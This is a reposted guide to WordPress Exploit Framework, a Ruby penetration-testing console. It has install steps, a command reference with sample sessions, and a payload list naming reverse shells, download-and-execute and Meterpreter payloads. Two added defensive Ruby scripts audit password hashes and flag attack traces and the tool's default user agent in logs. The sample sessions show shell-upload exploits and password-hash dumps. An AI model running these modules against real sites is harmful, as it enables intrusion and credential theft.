WordPress Exploit Framework - A Ruby Tool For WordPress Penetration Testing


WordPress Exploit Framework is an open source framework that is designed to aid in the penetration testing of WordPress systems.


Requirements:

  •  Ruby >= 2.4.4


How To Install WordPress Exploit Framework

To install the latest stable build, run gem install wpxf.

After installation, you can launch the WordPress Exploit Framework console by running wpxf.

Debian Systems:

If you have issues installing WPXF's dependencies (in particular, Nokogiri), first make sure you have all the tooling necessary to compile C extensions:
sudo apt-get install build-essential patch

It's also possible that you don't have the necessary development header files installed on your system. Here's what to do if you find yourself in that situation:
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev

If you are experiencing errors that indicate that libcurl.dll could not be loaded, you will need to ensure the latest libcurl binary is included in your Ruby bin folder, or any other folder that is in your environment's PATH variable.

The latest version can be downloaded from curl.haxx.se/download.html. As of 16/05/2016, the latest release is marked as Win32 2000/XP zip 7.40.0 libcurl SSL. After downloading the archive, extract the contents of the bin directory into your Ruby bin directory (if prompted, don't overwrite any existing DLLs).


How To Use WordPress Exploit Framework

Start the WordPress Exploit Framework console by running wpxf.

Once loaded, you'll be presented with the wpxf prompt. From here you can search for modules using the search command or load a module using the use command.

Loading a module into your environment will allow you to set options with the set command and view information about the module using info.

Below is an example of how one would load the symposium_shell_upload exploit module, set the module and payload options and run the exploit against the target.
wpxf > use exploit/shell/symposium_shell_upload

[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>

wpxf [exploit/shell/symposium_shell_upload] > set host wp-sandbox

[+] Set host => wp-sandbox

wpxf [exploit/shell/symposium_shell_upload] > set target_uri /wordpress/

[+] Set target_uri => /wordpress/

wpxf [exploit/shell/symposium_shell_upload] > set payload exec

[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>

wpxf [exploit/shell/symposium_shell_upload] > set cmd echo "Hello, world!"

[+] Set cmd => echo "Hello, world!"

wpxf [exploit/shell/symposium_shell_upload] > run

[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully


Supported Commands:

  • back
Changes the context of the session back to before loading the current module.
wpxf [exploit/shell/admin_shell_upload] > back
wpxf >


  • check
Check if the currently loaded module can be used against the specified target.
wpxf [exploit/shell/admin_shell_upload] > check

[!] Target appears to be vulnerable

wpxf [exploit/shell/admin_shell_upload] >


  • clear
Clear the screen.

  • creds
List the credentials stored in the current workspace.
wpxf > creds

ID  Host             Username  Password  Type
--  ---------------  --------  --------  -----
13  wordpress.vm:80  root      toor      plain
14  wordpress.vm:80  test                plain

wpxf >


  • creds -d [id]
Delete the credential with the matching [id] number.
wpxf > creds -d 8

[+] Deleted credential 8

wpxf >


  • gset
Set an option value globally, so that the current module and all modules loaded afterwards will use the specified value for the specified option.
wpxf > gset host wordpress.vm

[+] Globally set the value of host to wordpress.vm

wpxf > use exploit/shell/admin_shell_upload

[+] Loaded module: #<Wpxf::Exploit::AdminShellUpload:0x3578af0>

wpxf [exploit/shell/admin_shell_upload] > show options

Module options:

Name                 Current Setting  Required  Description
-------------------  ---------------  --------  -------------------------------------------
host                 wordpress.vm     true      Address of the target host.
http_client_timeout  5                true      Max wait time in seconds for HTTP responses
password                              true      The WordPress password to authenticate with
port                 80               true      Port the remote host is listening on
proxy                                 false     Proxy address ([protocol://]host:port)
ssl                  false            true      Use SSL/HTTPS for all requests
target_uri           /                true      Base path to the WordPress application
username                              true      The WordPress username to authenticate with
verbose              false            true      Enable verbose output
vhost                                 false     HTTP server virtual host

wpxf [exploit/shell/admin_shell_upload] >


  • gunset
Unset a global option set with the gset command.
wpxf > gunset host

[+] Removed the global setting for host

wpxf >


  • info
Display information about the currently loaded module.
wpxf [exploit/shell/admin_shell_upload] > info

Name: Admin Shell Upload
Module: exploit/shell/admin_shell_upload
Disclosed: 2015-02-21

Provided by:
rastating

Module options:

Name        Current Setting  Required  Description
----------  ---------------  --------  -------------------------------------------
host        wordpress.vm     true      Address of the target host.
password    toor             true      The WordPress password to authenticate with
port        80               true      Port the remote host is listening on
proxy                        false     Proxy address ([protocol://]host:port)
ssl         false            true      Use SSL/HTTPS for all requests
target_uri  /                true      Base path to the WordPress application
username    root             true      The WordPress username to authenticate with
verbose     false            true      Enable verbose output
vhost                        false     HTTP server virtual host

Description:
This module will generate a plugin, pack the payload into it and upload it to
a server running WordPress; providing valid admin credentials are used.


wpxf [exploit/shell/admin_shell_upload] >


  • loot
List the loot collected from targets in the current workspace.
wpxf > loot

ID  Host             Filename                 Notes                                  Type
--  ---------------  -----------------------  -------------------------------------  ---------
1   wordpress.vm:80  2018-07-14_15-00-56.csv  Registered users and e-mail addresses  user list

All filenames are relative to /home/rastating/.wpxf/loot

wpxf >


  • loot -d [id]
Delete the loot item with the matching [id] number.
wpxf > loot -d 1

[+] Deleted item 1

wpxf >



  • loot -p [id]
Print the content of the loot item with the matching [id] number.
wpxf > loot -p 2

Email,Name
"lPBrOHC@mBeTjaAGGh.com","atgvrf"
"gSLzaYG@uZVUAeSJvj.com","dowzvc"
"AMfWgAH@uDNuULjBQv.com","efhkjv"
"halFIgH@CYqrzDzwQU.com","omquqt"
"root@wordpress.vm","root"

wpxf >


  • quit
Exit the WordPress Exploit Framework prompt.

  • rebuild_cache
Re-build the module cache.
wpxf > rebuild_cache

[!] Refreshing the module cache...

wpxf >


  • run
Run the currently loaded module.
wpxf [auxiliary/hash_dump/simple_ads_manager_hash_dump] > run

[-] Determining database prefix...
[-] Dumping user hashes...

Username  Hash
--------  -----------------------------------
root      $P$BqL7kZ/A30CnAbIriSrXRmKvY9ynx80
ATgVrF    $P$Bc5VwreNVctuXYwqKuN0IOWiDib79g.
DOWzVC    $P$BwtOdeIGMW.jR7/zfzMp.kc4FJcPwB.
OmQUqt    $P$BOUcq9FWVxEyyrqyZNApW79kgPm7wq/
eFhkJv    $P$B1h9aF1cYdIBnAoh9F6NkchHXlTMpe.

[+] Execution finished successfully

wpxf [auxiliary/hash_dump/simple_ads_manager_hash_dump] >


  • set
Set an option value for the currently loaded module.
wpxf [exploit/shell/admin_shell_upload] > set host wordpress.vm

[+] Set host => wordpress.vm

wpxf [exploit/shell/admin_shell_upload] >


  • setg
Alias for gset.

  • search
Search for modules that contain one or more of the specified keywords.
wpxf > search rfi

[+] 3 Results for "rfi"

Module                                              Title
--------------------------------------------------  ----------------------------------------
exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload  Fast Image Adder <= 1.1 RFI Shell Upload
exploit/rfi/flickr_picture_backup_rfi_shell_upload  Flickr Picture Backup RFI Shell Upload
exploit/rfi/wp_mobile_detector_rfi_shell_upload     WP Mobile Detector RFI Shell Upload

wpxf >


  • show advanced
Show the advanced options of the currently loaded module.
wpxf [exploit/shell/admin_shell_upload] > show advanced

Name: basic_auth_creds
Current setting:
Required: false
Description: HTTP basic auth credentials (username:password)

Name: follow_http_redirection
Current setting: true
Required: true
Description: Automatically follow HTTP redirections

Name: max_http_concurrency
Current setting: 20
Required: true
Description: Max number of HTTP requests that can be made in parallel (Min: 1, Max: 200)

Name: proxy_auth_creds
Current setting:
Required: false
Description: Proxy server credentials (username:password)

Name: user_agent
Current setting: Mozilla/5.0 (Macintosh; U; U; Intel Mac OS X 10_7_6 rv:6.0; en-US) AppleWebKit/533.49.6 (KHTML, like Gecko) Version/4.0.2 Safari/533.49.6
Required: false
Description: The user agent string to send with all requests

Name: verify_host
Current setting: true
Required: true
Description: Enable host verification when using HTTPS

Name: wp_content_dir
Current setting: wp-content
Required: true
Description: The name of the wp-content directory.


wpxf [exploit/shell/admin_shell_upload] >


  • show auxiliary
Show the list of available auxiliary modules.
wpxf > show auxiliary

[+] 58 Auxiliaries

Module                                  Title
--------------------------------------  -----------------------------------------------------------
auxiliary/dos/load_scripts_dos          WordPress "load-scripts.php" DoS
auxiliary/dos/long_password_dos         Long Password DoS
auxiliary/dos/post_grid_file_deletion   Post Grid <= 2.0.12 Unauthenticated Arbitrary File Deletion
auxiliary/dos/wp_v4.7.2_csrf_dos        WordPress 4.2-4.7.2 - CSRF DoS

...

wpxf >


  • show exploits
Show the list of available exploits.
wpxf > show exploits

[+] 289 Exploits

Module                                                    Title
--------------------------------------------------------  --------------------------------------------
exploit/rfi/advanced_custom_fields_remote_file_inclusion  Advanced Custom Fields Remote File Inclusion
exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload        Fast Image Adder <= 1.1 RFI Shell Upload
exploit/rfi/flickr_picture_backup_rfi_shell_upload        Flickr Picture Backup RFI Shell Upload
exploit/rfi/gwolle_guestbook_remote_file_inclusion        Gwolle Guestbook Remote File Inclusion
exploit/rfi/wp_mobile_detector_rfi_shell_upload           WP Mobile Detector RFI Shell Upload

...

wpxf >


  • show options
Show the basic options of the currently loaded module.
wpxf [exploit/shell/admin_shell_upload] > show options

Module options:

Name                 Current Setting  Required  Description
-------------------  ---------------  --------  -------------------------------------------
host                 wordpress.vm     true      Address of the target host.
http_client_timeout  5                true      Max wait time in seconds for HTTP responses
password                              true      The WordPress password to authenticate with
port                 80               true      Port the remote host is listening on
proxy                                 false     Proxy address ([protocol://]host:port)
ssl                  false            true      Use SSL/HTTPS for all requests
target_uri           /                true      Base path to the WordPress application
username                              true      The WordPress username to authenticate with
verbose              false            true      Enable verbose output
vhost                                 false     HTTP server virtual host

wpxf [exploit/shell/admin_shell_upload] >


  • unset
Unset an option set with the set command.
wpxf [exploit/shell/admin_shell_upload] > unset host

[+] Unset host

wpxf [exploit/shell/admin_shell_upload] >


  • unsetg
Alias for gunset.

  • use
Load the specified module into the current context.
wpxf > use exploit/shell/admin_shell_upload

[+] Loaded module: #<Wpxf::Exploit::AdminShellUpload:0x3af1100>

wpxf [exploit/shell/admin_shell_upload] >


  • workspace
List the available workspaces.
wpxf > workspace

[-] default (active)
[-] test

wpxf >


  • workspace [name]
Switch to the [name] workspace.
wpxf > workspace test

[+] Switched to workspace: test

wpxf >


  • workspace -a [name]
Add a new workspace.
wpxf > workspace -a wiki

[+] Added workspace: wiki

wpxf >


  • workspace -d [name]
Delete the [name] workspace.
wpxf > workspace -d wiki

[+] Deleted workspace: wiki

wpxf >
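The hash dump printed by the run example above (auxiliary/hash_dump/simple_ads_manager_hash_dump) lists WordPress password hashes in the phpass "portable" format, where the character after $P$ encodes the MD5 iteration count. The Ruby script below is an added example and is not part of WPXF or of this page: it parses a dump table of that shape, reports the hashing scheme and work factor of every row, and flags weak schemes, which is what a defender reviewing such output wants to know. The sample table is constructed from the five rows shown above plus one made-up bcrypt row for contrast (that hash value is not a real digest).

```ruby
# Added example (not WPXF code): audit a "Username  Hash" dump table,
# classifying each hash by scheme and work factor.

# phpass itoa64 alphabet; the character after "$P$" indexes this table
# and gives log2 of the MD5 iteration count.
ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'.freeze

# WordPress "portable" phpass hash: $P$ (or $H$), 1 cost char, 8-char salt, 22-char digest.
PHPASS_RE = %r{\A\$[PH]\$(?<cost>[./0-9A-Za-z])(?<salt>[./0-9A-Za-z]{8})(?<digest>[./0-9A-Za-z]{22})\z}
# Standard bcrypt in modular crypt format: $2a$/$2b$/$2y$, 2-digit cost, 53 chars of salt+digest.
BCRYPT_RE = %r{\A\$2[aby]\$(?<cost>\d{2})\$[./0-9A-Za-z]{53}\z}

def classify_hash(hash)
  if (m = PHPASS_RE.match(hash))
    rounds = 2**ITOA64.index(m[:cost])
    # Iterated MD5 is cheap to brute-force; treat every portable hash as weak.
    { scheme: :phpass_portable, rounds: rounds, salt: m[:salt], weak: true }
  elsif (m = BCRYPT_RE.match(hash))
    cost = m[:cost].to_i
    { scheme: :bcrypt, rounds: 2**cost, salt: nil, weak: cost < 10 }
  else
    { scheme: :unknown, rounds: nil, salt: nil, weak: true }
  end
end

# Parse the table text. Header and separator rows are skipped because their
# second column does not start with "$".
def audit_dump(table_text)
  rows = table_text.each_line.map do |line|
    user, hash = line.strip.split(/\s+/, 2)
    next nil if hash.nil? || !hash.start_with?('$')
    classify_hash(hash).merge(user: user)
  end
  rows.compact
end

# Constructed sample: the rows from the dump above plus one made-up bcrypt row.
SAMPLE_DUMP = <<~TABLE
  Username  Hash
  --------  -----------------------------------
  root      $P$BqL7kZ/A30CnAbIriSrXRmKvY9ynx80
  ATgVrF    $P$Bc5VwreNVctuXYwqKuN0IOWiDib79g.
  DOWzVC    $P$BwtOdeIGMW.jR7/zfzMp.kc4FJcPwB.
  OmQUqt    $P$BOUcq9FWVxEyyrqyZNApW79kgPm7wq/
  eFhkJv    $P$B1h9aF1cYdIBnAoh9F6NkchHXlTMpe.
  auditor   $2y$10$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0
TABLE

if __FILE__ == $PROGRAM_NAME
  audit_dump(SAMPLE_DUMP).each do |r|
    printf("%-8s %-16s rounds=%-6s %s\n", r[:user], r[:scheme], r[:rounds].inspect,
           r[:weak] ? 'WEAK' : 'ok')
  end
end
```

For the rows shown on the page the cost character is B, index 13 in itoa64, so each hash is 8192 rounds of MD5; the script reports those as weak and the bcrypt row (cost 10, 1024 rounds) as acceptable.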


Difference Between Auxiliary and Exploit Modules

Auxiliary modules do not allow you to run payloads on the target machine, but instead allow you to extract information from the target, escalate privileges or provide denial of service functionality.

Exploit modules require you to specify a payload, which is then executed on the target machine. This lets you run arbitrary code to extract information from the machine, establish a remote shell, or do anything else you want within the context of the web server.
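The admin_shell_upload description earlier ("generate a plugin, pack the payload into it and upload it") together with the exploit/payload split described here gives a defender a concrete sequence to look for in web server logs: an authenticated plugin upload followed by a request to a PHP file under a plugin directory that was not installed before. The Ruby script below is an added example and not WPXF code: it scans access-log lines in the common "combined" format for that sequence, and additionally flags the default user_agent string listed under show advanced as a weak indicator (weak because user_agent is a configurable option). The log lines are constructed for this example, known_plugins is an assumed allowlist of plugin slugs expected on the site, and /wp-admin/update.php?action=upload-plugin is WordPress's plugin upload handler.

```ruby
require 'set'

# Added example (not WPXF code): look for the plugin-upload-then-execute
# sequence in access logs and surface it as findings.

# Combined log format: ip ident user [time] "METHOD path HTTP/x" status size "referer" "user-agent"
LINE_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) \S+ "[^"]*" "(?<ua>[^"]*)"\z/

# WordPress's plugin upload handler (wp-admin/update.php with action=upload-plugin).
UPLOAD_RE = %r{/wp-admin/update\.php\?action=upload-plugin}
# Any PHP file requested directly under a plugin directory; captures the plugin slug.
PLUGIN_PHP_RE = %r{/wp-content/plugins/(?<slug>[^/?]+)/[^?]*\.php}
# Default user_agent WPXF ships with (see show advanced). Weak indicator only: it can be changed.
WPXF_DEFAULT_UA = 'Mozilla/5.0 (Macintosh; U; U; Intel Mac OS X 10_7_6 rv:6.0; en-US) AppleWebKit/533.49.6 (KHTML, like Gecko) Version/4.0.2 Safari/533.49.6'.freeze

def parse_line(line)
  m = LINE_RE.match(line.strip)
  return nil unless m
  { ip: m[:ip], time: m[:time], method: m[:method], path: m[:path],
    status: m[:status].to_i, ua: m[:ua] }
end

# Returns an array of findings (:kind, :severity, :ip, :path, and :slug where relevant).
# known_plugins: assumed allowlist of plugin slugs legitimately installed on the site.
def analyse(log_text, known_plugins:)
  known = known_plugins.to_set
  uploaders = Set.new   # IPs that completed a plugin upload earlier in the log
  ua_reported = Set.new # IPs already flagged for the default user agent
  findings = []
  log_text.each_line do |raw|
    e = parse_line(raw)
    next unless e
    if e[:ua] == WPXF_DEFAULT_UA && ua_reported.add?(e[:ip])
      findings << { kind: :wpxf_user_agent, severity: :low, ip: e[:ip], path: e[:path] }
    end
    if e[:method] == 'POST' && e[:path] =~ UPLOAD_RE && e[:status] == 200
      uploaders << e[:ip]
      findings << { kind: :plugin_upload, severity: :info, ip: e[:ip], path: e[:path] }
    end
    if (pm = PLUGIN_PHP_RE.match(e[:path])) && !known.include?(pm[:slug])
      # An unknown plugin's PHP being hit after an upload from the same address
      # is the strongest signal this script produces.
      severity = uploaders.include?(e[:ip]) ? :high : :medium
      findings << { kind: :unknown_plugin_php_hit, severity: severity, ip: e[:ip],
                    path: e[:path], slug: pm[:slug] }
    end
  end
  findings
end

# Constructed sample traffic (not real logs): one address logs in, uploads a
# plugin and immediately requests a PHP file from the new plugin directory;
# a second address performs an ordinary plugin upload with no follow-up.
SAMPLE_LOG = <<~LOG
  203.0.113.10 - - [14/Jul/2018:15:00:40 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "#{WPXF_DEFAULT_UA}"
  203.0.113.10 - - [14/Jul/2018:15:00:41 +0000] "POST /wordpress/wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 4512 "-" "#{WPXF_DEFAULT_UA}"
  203.0.113.10 - - [14/Jul/2018:15:00:42 +0000] "GET /wordpress/wp-content/plugins/xkq8v2/xkq8v2.php HTTP/1.1" 200 14 "-" "#{WPXF_DEFAULT_UA}"
  198.51.100.7 - - [14/Jul/2018:15:01:05 +0000] "GET /wordpress/wp-content/plugins/akismet/akismet.css HTTP/1.1" 200 2210 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/61.0"
  198.51.100.7 - - [14/Jul/2018:15:01:06 +0000] "POST /wordpress/wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 3980 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/61.0"
LOG

if __FILE__ == $PROGRAM_NAME
  analyse(SAMPLE_LOG, known_plugins: %w[akismet hello]).each do |f|
    puts "#{f[:severity].to_s.upcase.ljust(6)} #{f[:kind]} #{f[:ip]} #{f[:path]}"
  end
end
```

On the sample the first address produces a low-severity user-agent note, an informational upload record and a high-severity hit on the unknown plugin slug, while the second address produces only the informational upload record; a real deployment would feed the allowlist from the site's actual plugin directory rather than a literal.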


Available Payloads

  • bind_php: uploads a script that will bind to a specific port and allow WPXF to establish a remote shell.
  • custom: uploads and executes a custom PHP script.
  • download_exec: downloads and runs a remote executable file.
  • meterpreter_bind_tcp: a Meterpreter bind TCP payload generated using msfvenom.
  • meterpreter_reverse_tcp: a Meterpreter reverse TCP payload generated using msfvenom.
  • exec: runs a shell command on the remote server and returns the output to the WPXF session.
  • reverse_tcp: uploads a script that will establish a reverse TCP shell.




Source: www.effecthacking.com